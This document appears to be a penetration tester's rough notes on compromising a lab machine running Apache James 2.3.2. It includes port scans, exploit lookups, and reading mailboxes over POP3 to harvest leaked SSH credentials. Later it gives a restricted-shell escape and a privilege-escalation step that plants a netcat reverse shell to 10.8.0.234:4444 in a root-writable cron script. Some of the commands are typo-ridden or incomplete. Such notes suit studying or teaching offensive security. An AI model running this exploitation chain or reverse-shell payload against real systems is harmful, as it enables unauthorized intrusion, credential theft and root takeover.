172.16.33.35 30 55 49 78 79 98 99 103 108 201(AD)


***********************************************************
172.16.33.35

    sudo nmap -p- 172.16.33.35 --open --reason
        ost is up, received echo-reply ttl 63 (0.034s latency).
        Not shown: 65529 closed tcp ports (reset)
        PORT     STATE SERVICE REASON
        22/tcp   open  ssh     syn-ack ttl 63
        25/tcp   open  smtp    syn-ack ttl 63
        80/tcp   open  http    syn-ack ttl 63
        110/tcp  open  pop3    syn-ack ttl 63
        119/tcp  open  nntp    syn-ack ttl 63
        4555/tcp open  rsip    syn-ack ttl 63

    nmap -sV -A 172.16.33.35
        Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-01 15:14 CST
        Nmap scan report for 172.16.33.35
        Host is up (0.40s latency).
        Not shown: 995 closed ports
        PORT    STATE SERVICE VERSION
        22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
        | ssh-hostkey: 
        |   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
        |   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
        |_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
        25/tcp  open  smtp    JAMES smtpd 2.3.2
        |_smtp-commands: solidstate Hello nmap.scanme.org (gateway [172.16.33.1]), 
        80/tcp  open  http    Apache httpd 2.4.25 ((Debian))
        |_http-server-header: Apache/2.4.25 (Debian)
        |_http-title: Home - Solid State Security
        110/tcp open  pop3    JAMES pop3d 2.3.2
        119/tcp open  nntp    JAMES nntpd (posting ok)
        Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
    # 80 is open, get the domain name is solid-state-security.com
    # add solid-state-security.com and www.solid-state-security.com to IP in the /etc/hosts file. 
    # this action may discover new things.
    
    # emulate the directions of the site
        dirsearch -u http://IP
        dirsearch -u xx -w /usr/share/seclists/Discovery/Web-Content/xx  # like big.txt  

    searchsploit james
        -------------------------------------------------------------------------------------- ---------------------------------
        Exploit Title                                                                        |  Path
        -------------------------------------------------------------------------------------- ---------------------------------
        Apache James Server 2.2 - SMTP Denial of Service                                      | multiple/dos/27915.pl
        Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit)  | linux/remote/48130.rb
        Apache James Server 2.3.2 - Remote Command Execution                                  | linux/remote/35513.py
        Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)        | linux/remote/50347.py
        WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow                   | windows/remote/944.c
        -------------------------------------------------------------------------------------- ---------------------------------
        Shellcodes: No Results

    under 35513.py a port 4555 may be connected which is used in the script.
        nc -nv IP 4555

        nc -nvC 172.16.33.35 110 #connect to the pop3 server on port 110 # C add a "\r" at the end of a command for nc
            Connection to 172.16.33.35 110 port [tcp/*] succeeded!
            +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready

            user XX
            pass XX
            list    
            retr $    # a email
                retr 2
                        +OK Message follows
                        Return-Path: <mailadmin@localhost>
                        Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
                        MIME-Version: 1.0
                        Content-Type: text/plain; charset=us-ascii
                        Content-Transfer-Encoding: 7bit
                        Delivered-To: mindy@localhost
                        Received: from 192.168.11.142 ([192.168.11.142])
                                by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
                                for <mindy@localhost>;
                                Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
                        Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
                        From: mailadmin@localhost
                        Subject: Your Access

                        Dear Mindy,


                        Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
                        Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

                        username: mindy
                        pass: P@55W0rd1!2@
            #ssh mindy to the target, get a rbash, to switch to a shell 
            ssh name#IP "export TERM=xterm; python -c 'import pty; pty.spawn(\"/bin/bash\")'"
            # work with the exploit 35513, get a shell finally. .

        #esclate priv
        uname,kernel, process, cron, writable file or dirc, SUID, home, env, sudo -s, getcap
        $uname -a    i686 means a 32bit OS, use gcc to create a 32bit file 



        1> root priv file
        $find / -type f -user root -perm -o=w 2>/dev/null | grep -v 'proc\|sys'

            
            # type file, owned by root, priv wirte, unmask proc or sys

             
            cat <<< "#!/usr/bin/env python
            import os
            import sys
            try:
                os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.0.234 4444 > /tmp/f')
            except:
                sys.exit()" > /opt/tmp.py
            $ nc -nv 4444 # on the host
            #when tmp.py will be run, a reverse shell will be sent

            2> pretty exploit
                50347.py will create a fully root shell 
            
            3> not well exploit
                35513.py

            #may need to get a full tty
                #on the condition of a better python shell,
                #on the host shell  $bash   $stty -a # to get the row and columns of current shell

             *   #then ssh to the target    needto be checked
             *   ctrl+z, stty raw -echo, fg, export SHELL=/bin/bash
             *   # the $ export TERM=srcreen, stty rows xx columns xx, reset
            dirtypipe



       
